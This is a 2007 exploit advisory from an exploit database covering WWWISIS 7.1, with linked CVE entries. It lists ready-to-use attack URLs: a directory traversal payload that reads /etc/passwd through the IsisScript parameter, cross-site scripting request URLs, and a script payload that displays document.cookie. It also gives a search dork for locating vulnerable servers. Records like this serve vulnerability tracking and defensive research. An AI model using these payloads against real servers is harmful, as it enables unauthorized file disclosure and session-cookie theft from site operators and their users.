Lucene search
JosSEDB-ID:4529HistoryOct 13, 2007 - 12:00 a.m.
WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting
2007-10-1300:00:00
JosS
www.exploit-db.com
78
# WWWISIS (Search) Multiple Vulnerabilities
# Download:
# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2
# Bug found by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# d0rk: powered by WWWISIS
#Stop lammer
# Local File Disclosure Vulnerability:
http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd
# Exploit In (XSS):
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e
....
[ i,e ... ] it is the language of script
# Cross Siting Scripting:
<script>alert(document.cookie)</script>
//---------------------------------------\\
Greetz To: All Hackers
JosS!
# milw0rm.com [2007-10-13]Related
cve
cve
CVE-2007-5455
2007-10-14 18:17:00
CVE-2007-5484
2007-10-16 23:17:00
nvd
nvd
CVE-2007-5455
2007-10-14 18:17:00
CVE-2007-5484
2007-10-16 23:17:00
prion
prion
Directory traversal
2007-10-16 23:17:00
Cross site scripting
2007-10-14 18:17:00
cvelist
cvelist
CVE-2007-5484
2007-10-16 23:00:00
CVE-2007-5455
2007-10-14 18:00:00